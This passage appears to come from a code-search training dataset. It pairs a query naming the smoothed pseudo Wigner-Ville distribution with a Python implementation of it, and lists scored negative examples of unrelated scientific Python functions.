self.Ki_f = self.Ki_f\r\n self.f_Ki_f = np.dot(self.f_hat.T, self.Ki_f)\r\n self.Ki_W_i = self.K - mdot(self.K, self.W12BiW12, self.K)", "def width_v_v_v(model: SingleRhNeutrinoModel, genv: Generation):\n mx = model.mx\n u = 0.5 * np.tan(2 * model.theta)\n w = parameters.GF**2 * mx**5 / (768 * np.pi**3) * u**2\n pre = 2 if genv == model.gen else 1.0\n return pre * w", "def genus(self):\n return 1 - self.euler_characteristic() // 2", "def betaW(self):\n if self.maCruise > 1:\n return 0\n else:\n return sqrt(1 - self.maCruise**2)", "def diff_comoving_volume(self, z):\n \n d_h_0 = self.hubble_distance_z(0.0)\n d_m = self.comoving_distance_transverse(z)\n ez = self.e_z(z)\n dvc = d_h_0*d_m**2./ez\n return(dvc)", "def distribution(self):\n \n #external_distribution serves both the purpose of external setting of distribution and the caching of distribution()\n if self.external_distribution:\n return self.external_distribution_array;\n else:\n energy_vector = []\n superset = self.generate_superset(0) \n \n for i in superset:\n state = self.ket(i)\n \n norm_squared = np.dot(state.T, state)\n \n if norm_squared > 0: #zero is appended at the end\n energy = np.dot(state.T, np.dot( self.epsilon, state))\n interaction = np.dot(state.T, np.dot( self.u, state))/2.0 #divide by two. Otherwise, <l r| U |l r > = U_LR + U_RL = 2U\n #print state, np.dot(self.u, state) \n #print interaction\n energy_vector.append( energy + interaction )\n \n energy_vector.insert(0, 0.0) \n probability = np.exp( np.multiply(-self.beta, energy_vector)) \n probability /= probability.sum() \n return probability", "def computeW(self):\n E = np.where(self.v > 0, 1, -1)\n # theshold the connections to only -1,1\n binary_weights = np.where(self.c > 0, 1, self.c)\n binary_weights = np.where(binary_weights < 0, -1, binary_weights)\n W = np.sum(binary_weights * np.dot(E.reshape(-1,1), E.reshape(1,-1))) # W = C * E * E\n self.W = W\n if np.sum(binary_weights) != 0:\n self.W = self.W / np.sum(binary_weights) # W / W*\n return self.W", "def __init__(self):\n super().__init__()\n self.lambdaVar = 1.0\n self.k = 1.0\n self.type = 'Weibull'\n self.distType = 'Continuous'\n self.low = 0.0\n self.hasInfiniteBound = True\n self.compatibleQuadrature.append('CDF')\n self.preferredQuadrature = 'CDF'\n self.preferredPolynomials = 'CDF'", "def Wv2(z, k, c_M=0):\n k *= 0.6763 # 1/Mpc\n c = 299792458/1000 # km/s\n W = -(1 - c/(Hcal(z)*chi(z)) + alpha_M(z, c_M)/2)*f(z)*H(z)/(1+z)*1/k**2\n W *= 1/c\n return W", "def vxc_PW92(n):\n eps = 1E-9*n # ???????\n SMALL = 1E-90\n if n < SMALL:\n return 0.0\n else:\n return exc_PW92(n) + n*exc_PW92(n,der=1)", "def _vce(self):\n sum = 0.0\n for sail in self.sails:\n cl2 = sail.cl(self.awa)**2\n cd2 = sail.cd(self.awa)**2\n sum += sail.area * sail.vce * sail.bk * np.sqrt(cl2+cd2)\n self._area()\n deltaCH = 0 if self.sails[1].up!=True else (1-self.ftj)*0.05*self.sails[1].IG\n Zce = sum/(self.area*np.sqrt(self.cl**2+self.cd**2)) - deltaCH\n return (Zce*(1-0.203*(1-self.flat)-0.451*(1-self.flat)*(1-self.fractionality)))", "def potega_it(podst, wykladnik):\n wynik = 1\n # i = 1\n # while i <= wykladnik:\n for i in range(wykladnik):\n wynik = wynik * podst\n # i = i + 1\n return wynik", "def u(self, k, m, z):\n result = self.ProfNFW.nfw(k, m, z) * self.Ngal(m) / self.nBarGal(1./(1.+z))\n return result", "def trueDiversity(blau):\n\n return - np.sqrt(1/(blau-1))", "def chauvenet_criterion(npoints, p=0.5):\n \n \n return np.abs(stats.norm.ppf(p/(2.*npoints), loc=0., scale=1.))", "def excess_noise_PDF(y,base_noise,Poisson=False):\n \n y, base_noise = array(y), array(base_noise)\n ymn = mean(y)\n yvar = var(y)\n base_var = base_noise**2\n x_guess = sqrt(yvar - mean(base_var)) if yvar > mean(base_var) else 0.0\n \n def log_like(mn,x_noise,log_norm_fac):\n x_var = x_noise**2\n var = x_var + base_var\n terms = -log(2*pi*var)/2 - (y - mn)**2/2/var\n return sum(terms) + log_norm_fac\n \n #initial pass at a normalization factor - use peak value\n def neg_like(x):\n mn,x_noise= x\n return -log_like(mn,x_noise,0.0)\n result = minimize(neg_like, [ymn,x_guess], method='Nelder-Mead')\n log_norm_fac = result.fun\n mn_pk, x_noise_pk = result.x\n \n def like(mn,x_noise):\n return exp(log_like(mn, x_noise, log_norm_fac))\n \n def xmn_like(xnorm):\n constrained_like = lambda mn: like(mn, xnorm*mn)\n result = quad(constrained_like, mn_pk, inf)[0]\n result += -quad(constrained_like, mn_pk, 0.0)[0]\n return result\n \n xmn_pk = x_noise_pk/mn_pk\n result = minimize(lambda x: -xmn_like(x), xmn_pk, method='Nelder-Mead')\n xmn_pk = result.x[0]\n# f_pk = -result.fun\n if xmn_pk < 0.0: xmn_pk = 0.0\n# width = 1.0/f_pk\n# area = pu.gauss_integrate(xmn_like, xmn_pk, 0.0, inf, sigma_guess=width)\n area = quad(xmn_like, xmn_pk, inf)[0]\n area += -quad(xmn_like, xmn_pk, 0.0)[0]\n pdf = lambda x: xmn_like(x)/area if x >= 0.0 else 0.0\n# if pdf(xmn_pk) <= 0.0: pdb.set_trace()\n return pdf, xmn_pk", "def _denoise_tv_chambolle_nd(image, weight=0.1, eps=2.e-4, n_iter_max=200,\n xp=None):\n\n ndim = image.ndim\n p = xp.zeros((image.ndim, ) + image.shape, dtype=image.dtype)\n g = xp.zeros_like(p)\n d = xp.zeros_like(image)\n i = 0\n slices_g = [slice(None), ] * (ndim + 1)\n slices_d = [slice(None), ] * ndim\n slices_p = [slice(None), ] * (ndim + 1)\n while i < n_iter_max:\n if i > 0:\n # d will be the (negative) divergence of p\n d = -p.sum(0)\n for ax in range(ndim):\n slices_d[ax] = slice(1, None)\n slices_p[ax+1] = slice(0, -1)\n slices_p[0] = ax\n d[tuple(slices_d)] += p[tuple(slices_p)]\n slices_d[ax] = slice(None)\n slices_p[ax+1] = slice(None)\n out = image + d\n E = (d * d).sum()\n else:\n out = image\n E = 0.\n\n # g stores the gradients of out along each axis\n # e.g. g[0] is the first order finite difference along axis 0\n for ax in range(ndim):\n slices_g[ax+1] = slice(0, -1)\n slices_g[0] = ax\n if xp == np:\n g[tuple(slices_g)] = xp.diff(out, axis=ax)\n else:\n g[tuple(slices_g)] = diff(out, axis=ax)\n slices_g[ax+1] = slice(None)\n\n norm = (g * g).sum(axis=0, keepdims=True)\n xp.sqrt(norm, out=norm)\n E += weight * norm.sum()\n tau = 1. / (2.*ndim)\n norm *= tau / weight\n norm += 1.\n p -= tau * g\n p /= norm\n E /= float(image.size)\n if i == 0:\n E_init = E\n E_previous = E\n else:\n if abs(E_previous - E) < eps * E_init:\n break\n else:\n E_previous = E\n i += 1\n return out", "def compute_mixing_coefficients_bot(self):\n [Ly,N] = self.b.shape\n z_u_w = self.grid_dict['z_u_w']\n\n v_upts = TTTW_func.v2u(self.v)\n\n self.sigma_bot = []\n self.Kv0 = np.zeros([Ly,N+1])\n self.Kt0 = np.zeros([Ly,N+1])\n for j in range(Ly):\n # turbulent velocity sclaes with buoyancy effects neglected\n ustar2 = self.r_D[j] * np.sqrt(self.u[j,0]**2 + v_upts[j,0]**2)\n wm = self.vonKar * np.sqrt(ustar2)\n ws = wm\n \n for k in range(1,N):\n k_w = k\n k_r = k - 1\n\n if k_w < self.kbl[j]: # NEED Zob\n sigma = np.min( [ ((z_u_w[j,k_w] - z_u_w[j,0] + self.Zob) / (self.hbbl[j] + self.Zob)),1.])\n if j ==1:\n self.sigma_bot.append(sigma)\n a1 = sigma - 2.\n a2 = 3. - 2.*sigma\n a3 = sigma - 1.\n\n self.Kv0[j,k_w] = wm * self.hbbl[j] * ( sigma * (1. + sigma * ( a1 + a2*self.Gm1_bot[j]+a3*self.dGm1_dS_bot[j]))) \n self.Kt0[j,k_w] = ws * self.hbbl[j] * ( sigma * (1. + sigma * ( a1 + a2*self.Gt1_bot[j]+a3*self.dGt1_dS_bot[j])))", "def posteriorDistribution(x,z,beta,sigma2):\r\n ### TODO: Write your code here\r\n mu = 0\r\n Cov = 0\r\n\r\n x_s = []\r\n for i in np.linspace(-1 , 1 , 150):\r\n for j in np.linspace(-1 , 1 , 150):\r\n x_s.append([i,j])\r\n x_s = np.array(x_s)\r\n\r\n X = []\r\n for i in x:\r\n j = [1,i[0]]\r\n X.append(j)\r\n X = np.array(X)\r\n\r\n common = np.matmul( X.T , X) + np.identity(2) * sigma2/beta\r\n common = np.linalg.inv(common)\r\n Cov = common * sigma2\r\n mu = np.matmul(common , np.matmul (X.T , z) )\r\n mu = mu.flatten()\r\n print(\"X.shape: \" , X.shape)\r\n print(\"z.shape: \",z.shape)\r\n print(\"Cov.shape\" , Cov.shape)\r\n print(\"mu.shape: \",mu.shape)\r\n density = util.density_Gaussian(mu , Cov , x_s).reshape(150 , 150 ).T\r\n print(\"density.shape\",density.shape)\r\n X,Y = np.meshgrid( np.linspace(-1,1,150) , np.linspace(-1,1,150) )\r\n\r\n \r\n\r\n plt.contour( X , Y , np.reshape(density , (150, 150 )))\r\n plt.plot(-0.1 , -0.5 , marker = 'o' , MarkerSize = 10 , label = 'point a')\r\n plt.xlabel('a0 ')\r\n plt.ylabel(' a1 ')\r\n plt.legend()\r\n plt.xlim = (-1,1)\r\n plt.ylim = (-1,1)\r\n plt.title('p(a|x1,z1....xn,zn) for '+ str(len(x)) +' samples')\r\n plt.show() \r\n print('-x-x-x-x-x-x-x-x-x')\r\n\r\n return (mu,Cov)", "def v_p(self, psi_l, ci):\n\t\treturn min((ci*self.VPMAX0)/(ci + self.KP), self.VPR)", "def generate_good(self, m, n, rank, mu=2, ka=2):\n sr = random.random()\n s = []\n s.append(sr)\n for r in range(rank-1):\n newele = s[-1] * (1 + ka * random.random() / (rank-1))\n s.append(newele)\n s.reverse()\n \n # best_u = None\n # best_mu0 = 0\n # while best_mu0 == 0:\n # for _ in range(10):\n # A = np.random.rand(m,m)\n # A = scipy.linalg.orth(A)\n # u = A[:, :rank]\n # mu0 = self.compute_mu(u, m, rank)\n # print(\"mu0 : \", mu0)\n # if mu0 <= mu and mu0 >= best_mu0:\n # best_mu0 = mu0\n # best_u = u\n # print(\"mu0 for u:\", best_mu0)\n # # print(u.T @ u)\n \n # best_v = None\n # best_mu0 = 0\n # while best_mu0 == 0:\n # for _ in range(10):\n # B = np.random.rand(n,n)\n # B = scipy.linalg.orth(B)\n # v = B[:, :rank]\n # mu0 = self.compute_mu(v, n, rank)\n # print(\"mu0 : \", mu0)\n # if mu0 <= mu and mu0 >= best_mu0:\n # best_mu0 = mu0\n # best_v = v\n # print(\"mu0 for v:\", best_mu0)\n # u = best_u\n # v = best_v\n\n for _ in range(100):\n A = np.random.rand(m,m)\n A = scipy.linalg.orth(A)\n u = A[:, :rank]\n mu0 = self.compute_mu(u, m, rank)\n print(\"mu0 : \", mu0)\n if mu0 <= mu:\n break\n print(\"mu0 for u:\", mu0) \n\n for _ in range(10):\n B = np.random.rand(n,n)\n B = scipy.linalg.orth(B)\n v = B[:, :rank]\n mu0 = self.compute_mu(v, n, rank)\n print(\"mu0 : \", mu0)\n if mu0 <= mu:\n break\n print(\"mu0 for both:\", mu0)\n\n matrix = np.dot(u*s, v.T)\n \n kappa = s[0] / s[-1]\n print(\"kappa=\", kappa)\n \n ss = np.copy(s)\n for k in range(rank):\n ss[k] = s[k] / s[0]\n \n max_entry = np.max(np.abs(np.outer(u[:,:rank], v.T[:rank,:])))\n mu1 = max_entry * math.sqrt(m * n / rank)\n print(\"mu1=\", mu1)\n \n return matrix", "def calc_points_public(self):\n if self.cnt_public >= 2:\n nb_public_in_district = [0, 0, 0, 0, 0]\n i_to_district = (0, 0, 1, 2, 2, 0, 0, 1, 2, 2, 3, 3, 1, 4, 4, 3, 3, 1, 4, 4)\n for i in range(20):\n if self.b[i] == 'U':\n nb_public_in_district[i_to_district[i]] += 1\n districts = len([1 for x in nb_public_in_district if x > 0])\n vptab_public = (0, 2, 5, 9, 14, 20)\n points = vptab_public[districts] + self.cnt_public - len(args.exp) + self.cnt_public * ('hall' in args.exp)\n points += min(self.cnt_public - len(args.exp), 2)\n return points\n elif self.cnt_public == 1:\n points = 4 - 2 * len(args.exp) + ('hall' in args.exp)\n return points\n return 0", "def _r_inv(self):\n return self.sites.precisions", "def kepler_U_prv(mu, x , dt, ro, vro, inv_a, nMax=500):\n\n error = 1.0e-8\n n = 0\n ratio = 1\n while (abs(ratio) > error) and (n <= nMax) :\n n = n + 1\n z = x*x\n C = stump_C(inv_a*z)\n S = stump_S(inv_a*z)\n F = ro*vro/sqrt(mu)*z*C + (1 - inv_a*ro)*z*x*S + ro*x - sqrt(mu)*dt\n dFdx = ro*vro/sqrt(mu)*x*(1 - inv_a*z*S) + (1 - inv_a*ro)*z*C + ro\n ratio = F/dFdx\n x = x - ratio\n if n > nMax :\n return (False,x,ratio)\n else :\n return (True,x,ratio)", "def WaterVaporTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/828.5e-9,lp.c/828e-9]),sim_nu=np.array([])):\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n ext_wv = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(lp.mH2O*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True).T\n T_wv = np.exp(-np.cumsum(n_wv[np.newaxis,:]*ext_wv,axis=1)*dr)\n \n return T_wv,sim_nu", "def wind_ppa():\n per_kwh = 0.0384 # [$/kWh]\n\n return per_kwh", "def gaussp(y1, y2, n):\n\n # First check for trivial or stupid requests\n if n <= 0:\n raise ValueError(\"Zero (or less) grid points is stupid. Stop it.\")\n if n == 1:\n r = np.array([0.5*(y2 + y1)])\n wt = np.array([y2 - y1])\n return r, wt\n N_pi = 3.14159265358979323844 # Fortran uses stupid pi because of course it does\n EPS = 1e-14 # Desired accuracy\n n_sav = -1\n\n if n != n_sav:\n n_sav = n\n m = n\n m, r, wt = GridGenerator.gausspp(m)\n m = 0\n\n if m != n:\n m = int((n+1)/2) # Care, integer division\n x = np.zeros((2*m)) # Working r, not returned\n w = np.zeros((2*m)) # Working wt, not returned\n r = np.zeros((2*m))\n wt = np.zeros((2*m))\n for i in range(m):\n r[i] = N_pi*(i+0.75)/(n+0.5)\n r = np.cos(r)\n\n for i in range(m):\n z = r[i]\n z1 = 1e20 # Arbitrary large number to ensure at least 1 loop\n while abs(z-z1) > EPS:\n p1 = 1.0\n p2 = 0.0\n for j in range(n):\n p3 = p2\n p2 = p1\n p1 = ((2*(j + 1) - 1)*z*p2 - j*p3)/(j + 1)\n pp = n*(z*p1 - p2)/(z*z - 1.0)\n z1 = z\n z = z1 - p1/pp\n x[i] = -z\n x[n - (i + 1)] = z\n w[i] = 2.0/((1.0 - z*z)*pp*pp)\n w[n - (i + 1)] = w[i]\n\n for i in range(n):\n fact = 0.5*(y2-y1)\n r[i] = y1 + fact*(x[i] + 1.0)\n wt[i] = fact*w[i]\n\n return n, r, wt", "def weight(self):", "def dcweights(x):\n\n #Form the vanderMonde matrix:\n A=np.vander(x).T\n A=A[::-1,:]\n F=0*A\n n=snp.arange(len(x))+1\n for i in range(len(x)-1):\n a=x[i]; b=x[i+1]\n f=(b**n-a**n)/n\n F[:,i]=f\n w=snp.solve(A,F)\n\n return w[:,:-1]", "def get_whitener( A, k ):\n\n U, D, _ = svdk(A, k)\n Ds = sqrt(D)\n Di = 1./Ds\n return U.dot(diag(Di)), U.dot(diag(Ds))", "def genus(P, E, F, V=None):\n\n return euler_characteristic(P, E, F, V)-2", "def __init__(self, w=None, d=None, delta=None, epsilon=None, bits=256):\r\n\t\t\r\n\t\tif w is not None and d is not None:\r\n\t\t\tself.w = w\r\n\t\t\tself.d = d\r\n\t\telif delta is not None and epsilon is not None:\r\n\t\t\tself.w = int(ceil(e/epsilon))\r\n\t\t\tself.d = int(ceil(log(1./delta)))\r\n\t\t\tprint self.w, self.d\r\n\t\telse:\r\n\t\t\traise Exception(\"You must either supply both w and d or delta and epsilon.\")\r\n\t\t\r\n\t\tif 2**bits < w:\r\n\t\t\traise Exception(\"Too few bits for w\")\r\n\r\n\t\t#Values taken from http://www.isthe.com/chongo/tech/comp/fnv/\t\t\r\n\t\tif bits == 32:\r\n\t\t\tself.prime = 0x1000193\r\n\t\t\tself.offset = 0x811c9dc5\r\n\t\telif bits == 64:\r\n\t\t\tself.prime = 0x100000001b3\r\n\t\t\tself.offset = 0xcbf29ce484222325L\r\n\t\telif bits == 128:\r\n\t\t\tself.prime = 0x1000000000000000000013bL\r\n\t\t\tself.offset = 0x6c62272e07bb014262b821756295c58dL\r\n\t\telif bits == 256:\r\n\t\t\tself.prime = 0x1000000000000000000000000000000000000000163L\r\n\t\t\tself.offset = 0xdd268dbcaac550362d98c384c4e576ccc8b1536847b6bbb31023b4c8caee0535L\r\n\t\telif bits == 512:\r\n\t\t\tself.prime = 0x100000000000000000000000000000000000000000000000000000000000000000000000000000000000157L\r\n\t\t\tself.offset = 0xb86db0b1171f4416dca1e50f309990acac87d059c90000000000000000000d21e948f68a34c192f62ea79bc942dbe7ce182036415f56e34bac982aac4afe9fd9L\r\n\t\telif bits == 1024:\r\n\t\t\tself.prime = 0x10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000018dL\r\n\t\t\tself.offset = 0x5f7a76758ecc4d32e56d5a591028b74b29fc4223fdada16c3bf34eda3674da9a21d9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c6d7eb6e73802734510a555f256cc005ae556bde8cc9c6a93b21aff4b16c71ee90b3L\r\n\t\telse:\r\n\t\t\traise Exception(\"Bits must be 32, 64, 128, 256, 512, or 1024\")\r\n\t\tself.L = self.w*(2**bits/self.w)\r\n\t\tself.mod = 2**bits-1\r\n\t\tself.bits = bits\r\n\t\tself.count = zeros((self.d, self.w), dtype=int32)\r\n\t\tself.rows = arange(self.d)\r\n\t\tself.shift_by = int(ceil(log(self.w, 2)))", "def unbalanced_Wasserstein_L1(mu,nu,x = None,alpha = 1):\n\n N = mu.size\n \n if x is None:\n x = np.linspace(0,1,N)\n\n dx = x[1]-x[0]\n\n mass_diff = np.sum((mu-nu) * dx) \n\n Integrand = np.abs( np.cumsum(mu-nu) - x * mass_diff )\n\n\n UW1 = np.sum(Integrand * dx) + (1/alpha)* np.abs( mass_diff )\n\n return UW1", "def rosen_der(x):\n xm = x[1:-1]\n xm_m1 = x[:-2]\n xm_p1 = x[2:]\n der = np.zeros_like(x)\n der[1:-1] = 200*(xm-xm_m1**2) - 400*(xm_p1 - xm**2)*xm - 2*(1-xm)\n der[0] = -400*x[0]*(x[1]-x[0]**2) - 2*(1-x[0])\n der[-1] = 200*(x[-1]-x[-2]**2)\n return der" ]
[ "0.61289203", "0.5875487", "0.58468914", "0.5686039", "0.56515056", "0.56493896", "0.5648032", "0.56267035", "0.5614728", "0.5562713", "0.5514241", "0.5454711", "0.5417939", "0.54137903", "0.53736", "0.53622884", "0.53448796", "0.5342925", "0.5333436", "0.53204405", "0.52887064", "0.52642024", "0.52560556", "0.52532494", "0.52346927", "0.52274686", "0.5227112", "0.52229697", "0.5221526", "0.5215328", "0.52027434", "0.5183674", "0.5173784", "0.5170593", "0.5170241", "0.5156524", "0.51563054", "0.51456636", "0.5145633", "0.5145349", "0.5136545", "0.5134752", "0.5128998", "0.5125624", "0.51236254", "0.5123321", "0.5123321", "0.5123252", "0.5122395", "0.5119689", "0.51148367", "0.5113817", "0.5113729", "0.5105356", "0.5104077", "0.5103753", "0.50928074", "0.5088988", "0.5088988", "0.5088988", "0.5088988", "0.5088988", "0.5088988", "0.50713205", "0.5068717", "0.5066665", "0.506224", "0.505925", "0.5057999", "0.50512135", "0.50511026", "0.504801", "0.50420356", "0.5035525", "0.5035484", "0.50261307", "0.5025521", "0.5015386", "0.5012752", "0.49914604", "0.49880427", "0.49859688", "0.49816287", "0.49771768", "0.49766853", "0.4976428", "0.49761584", "0.49754044", "0.49729025", "0.49708012", "0.49647433", "0.49615547", "0.49605072", "0.49575132", "0.49547657", "0.49516523", "0.49410483", "0.49406168", "0.4929739", "0.4924364", "0.4921875" ]
0.0
-1
Smoothed Pseudo Wigner Ville Distribution
def smooth_pseudo_wvd( signal, sampling_rate=1000, freq_length=None, time_length=None, segment_step=1, nfreqbin=None, window_method="hamming", ): # Define parameters N = len(signal) # sample_spacing = 1 / sampling_rate if nfreqbin is None: nfreqbin = 300 # Zero-padded signal to length 2N signal_padded = np.append(signal, np.zeros_like(signal)) # DFT signal_fft = np.fft.fft(signal_padded) signal_fft[1 : N - 1] = signal_fft[1 : N - 1] * 2 signal_fft[N:] = 0 # Inverse FFT signal_ifft = np.fft.ifft(signal_fft) signal_ifft[N:] = 0 # Make analytic signal signal = scipy.signal.hilbert(signal_detrend(signal_ifft)) # Create smoothing windows in time and frequency if freq_length is None: freq_length = np.floor(N / 4.0) # Plus one if window length is not odd if freq_length % 2 == 0: freq_length += 1 elif len(freq_length) % 2 == 0: raise ValueError("The length of frequency smoothing window must be odd.") if time_length is None: time_length = np.floor(N / 10.0) # Plus one if window length is not odd if time_length % 2 == 0: time_length += 1 elif len(time_length) % 2 == 0: raise ValueError("The length of time smoothing window must be odd.") if window_method == "hamming": freq_window = scipy.signal.hamming(int(freq_length)) # normalize by max time_window = scipy.signal.hamming(int(time_length)) # normalize by max elif window_method == "gaussian": std_freq = freq_length / (6 * np.sqrt(2 * np.log(2))) freq_window = scipy.signal.gaussian(freq_length, std_freq) freq_window /= max(freq_window) std_time = time_length / (6 * np.sqrt(2 * np.log(2))) time_window = scipy.signal.gaussian(time_length, std_time) time_window /= max(time_window) # to add warning if method is not one of the supported methods # Mid-point index of windows midpt_freq = (len(freq_window) - 1) // 2 midpt_time = (len(time_window) - 1) // 2 # Create arrays time_array = np.arange(start=0, stop=N, step=segment_step, dtype=int) / sampling_rate # frequency_array = np.fft.fftfreq(nfreqbin, sample_spacing)[0:nfreqbin / 2] frequency_array = 0.5 * np.arange(nfreqbin, dtype=float) / N pwvd = np.zeros((nfreqbin, len(time_array)), dtype=complex) # Calculate pwvd for i, t in enumerate(time_array): # time shift tau_max = np.min( [t + midpt_time - 1, N - t + midpt_time, np.round(N / 2.0) - 1, midpt_freq] ) # time-lag list tau = np.arange( start=-np.min([midpt_time, N - t]), stop=np.min([midpt_time, t - 1]) + 1, dtype="int" ) time_pts = (midpt_time + tau).astype(int) g2 = time_window[time_pts] g2 = g2 / np.sum(g2) signal_pts = (t - tau - 1).astype(int) # zero frequency pwvd[0, i] = np.sum(g2 * signal[signal_pts] * np.conjugate(signal[signal_pts])) # other frequencies for m in range(int(tau_max)): tau = np.arange( start=-np.min([midpt_time, N - t - m]), stop=np.min([midpt_time, t - m - 1]) + 1, dtype="int", ) time_pts = (midpt_time + tau).astype(int) g2 = time_window[time_pts] g2 = g2 / np.sum(g2) signal_pt1 = (t + m - tau - 1).astype(int) signal_pt2 = (t - m - tau - 1).astype(int) # compute positive half rmm = np.sum(g2 * signal[signal_pt1] * np.conjugate(signal[signal_pt2])) pwvd[m + 1, i] = freq_window[midpt_freq + m + 1] * rmm # compute negative half rmm = np.sum(g2 * signal[signal_pt2] * np.conjugate(signal[signal_pt1])) pwvd[nfreqbin - m - 1, i] = freq_window[midpt_freq - m + 1] * rmm m = np.round(N / 2.0) if t <= N - m and t >= m + 1 and m <= midpt_freq: tau = np.arange( start=-np.min([midpt_time, N - t - m]), stop=np.min([midpt_time, t - 1 - m]) + 1, dtype="int", ) time_pts = (midpt_time + tau + 1).astype(int) g2 = time_window[time_pts] g2 = g2 / np.sum(g2) signal_pt1 = (t + m - tau).astype(int) signal_pt2 = (t - m - tau).astype(int) x = np.sum(g2 * signal[signal_pt1] * np.conjugate(signal[signal_pt2])) x *= freq_window[midpt_freq + m + 1] y = np.sum(g2 * signal[signal_pt2] * np.conjugate(signal[signal_pt1])) y *= freq_window[midpt_freq - m + 1] pwvd[m, i] = 0.5 * (x + y) pwvd = np.real(np.fft.fft(pwvd, axis=0)) # Visualization return frequency_array, time_array, pwvd
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _smooth(values, std):\n width = std * 4\n x = np.linspace(-width, width, min(2 * width + 1, len(values)))\n kernel = np.exp(-(x / 5)**2)\n\n values = np.array(values)\n weights = np.ones_like(values)\n\n smoothed_values = np.convolve(values, kernel, mode='same')\n smoothed_weights = np.convolve(weights, kernel, mode='same')\n\n return smoothed_values / smoothed_weights", "def smooth(self, xs, ys, x):\n w = np.sum(np.exp(np.multiply(np.square(np.divide(np.subtract(xs, x), self.sigma)), -0.5)))\n v = np.sum(np.multiply(ys, np.exp(np.multiply(np.square(np.divide(np.subtract(xs, x), self.sigma)), -0.5))))\n\n return v / w", "def smooth(inputdata, w, imax):\n data = 1.0*inputdata\n data = data.replace(np.nan, 1)\n data = data.replace(np.inf, 1)\n \n smoothed = 1.0*data\n normalization = 1\n for i in range(-imax, imax+1):\n if i==0:\n continue\n smoothed += (w**abs(i))*data.shift(i, axis=0)\n normalization += w**abs(i)\n smoothed /= normalization\n return smoothed", "def smooth_series(y,p = 6.25):\n cycle, trend = sm.tsa.filters.hpfilter(y, p)\n return trend", "def gauss_smoothing(engine, smoothed, R, d_k):\n code = CodeSegment(engine)\n def tf(k):\n k2 = sum(ki**2 for ki in k)\n wts = numpy.exp(-0.5*k2* R**2)\n return wts\n \n code.assign(x='d_k', y='tmp')\n code.transfer(complex='tmp', tf=tf)\n code.c2r(real=smoothed, complex='tmp')\n return code", "def test_linear_2d_merwe():\n\n\n def fx(x, dt):\n F = np.array([[1, dt, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, dt],\n [0, 0, 0, 1]], dtype=float)\n\n return np.dot(F, x)\n\n def hx(x):\n return np.array([x[0], x[2]])\n\n\n dt = 0.1\n points = MerweScaledSigmaPoints(4, .1, 2., -1)\n kf = UKF(dim_x=4, dim_z=2, dt=dt, fx=fx, hx=hx, points=points)\n\n\n kf.x = np.array([-1., 1., -1., 1])\n kf.P*=0.0001\n #kf.R *=0\n #kf.Q\n\n zs = []\n for i in range(20):\n z = np.array([i+randn()*0.1, i+randn()*0.1])\n zs.append(z)\n\n Ms, Ps = kf.batch_filter(zs)\n smooth_x, _, _ = kf.rts_smoother(Ms, Ps, dt=dt)\n\n if DO_PLOT:\n plt.figure()\n zs = np.asarray(zs)\n plt.plot(zs[:,0], marker='+')\n plt.plot(Ms[:,0], c='b')\n plt.plot(smooth_x[:,0], smooth_x[:,2], c='r')\n print(smooth_x)", "def scw_loss(phi, v, m):\n return max(0, phi * np.sqrt(v) - m)", "def fingauss_smoothing(engine, smoothed, R, d_k):\n code = CodeSegment(engine)\n def tf(k):\n k2 = sum(((2*kny/numpy.pi)*numpy.sin(ki*numpy.pi/(2*kny)))**2 for ki in k)\n wts = numpy.exp(-0.5*k2* R**2)\n return wts\n \n kny = numpy.pi*engine.pm.Nmesh[0]/engine.pm.BoxSize[0]\n code.assign(x='d_k', y='tmp')\n code.transfer(complex='tmp', tf=tf)\n code.c2r(real=smoothed, complex='tmp')\n return code", "def Psmooth(self, k):\n om = self.om\n ol = self.ol\n omz = self.cosmology.Om(self.z) # Omega matter at z\n olz = ol/np.square(self.cosmology.efunc(self.z)) # MBW Eqn 3.77\n g0 = 5/2*om/(np.power(om, 4/7) - ol + ((1+om/2)*(1+ol/70))) # Eqn 4.76\n gz = 5/2*omz/(np.power(omz, 4/7) - olz + ((1+omz/2)*(1+olz/70)))\n Dlin_ratio = gz / (1+self.z) / g0\n Psmooth = self.P0smooth * np.square(self.T0(k)) * \\\n np.power(k, self.ns) * np.square(Dlin_ratio)\n return Psmooth", "def test_linear_2d_merwe_column():\n\n\n def fx(x, dt):\n F = np.array([[1, dt, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, dt],\n [0, 0, 0, 1]], dtype=float)\n\n return np.dot(F, x)\n\n def hx(x):\n return np.array([x[0], x[2]])\n\n\n dt = 0.1\n points = MerweScaledSigmaPoints2(4, .1, 2., -1)\n kf = UKF2(dim_x=4, dim_z=2, dt=dt, fx=fx, hx=hx, points=points)\n\n\n kf.x = np.array([[-1., 1., -1., 1]]).T\n kf.P*=0.0001\n #kf.R *=0\n #kf.Q\n\n zs = []\n for i in range(20):\n z = np.array([[i+randn()*0.1],\n [i+randn()*0.1]])\n zs.append(z)\n\n Ms, Ps = kf.batch_filter(zs)\n smooth_x, _, _ = kf.rts_smoother(Ms, Ps, dt=dt)\n\n if DO_PLOT:\n plt.figure()\n zs = np.asarray(zs)\n plt.plot(zs[:,0], marker='+', c='b')\n plt.plot(Ms[:,0], c='b')\n plt.plot(smooth_x[:,0], smooth_x[:,2], c='r')\n print(smooth_x)", "def generate_stat(sample_size, sparsity = 0, amplitude = 0, sigma = 1):\n var = generate_variable(sample_size, sparsity, amplitude, sigma)\n y_obs = var[0]\n \n \"\"\" \n f is equal to -X(t,theta) and we will minimize f (max. X)\n \"\"\"\n def f(x):\n \"\"\" \n f(x)=-X(t,theta) where x[0]=t and x[1]=theta\n \"\"\"\n res = np.real(np.exp(-1j*x[1])*\\\n sum(y_obs[k+sample_size]*np.exp(1j*k*x[0]) \\\n for k in range(-sample_size,sample_size+1))) \n res = -res/np.sqrt(2*sample_size+1) \n return res\n \n def grad_f(x):\n \"\"\" \n gradient of f\n \"\"\"\n res1 = np.real(np.exp(-1j*x[1])*\\\n sum(1j*k*y_obs[k+sample_size]*np.exp(1j*k*x[0]) \\\n for k in range(-sample_size,sample_size+1)))\n res1 = 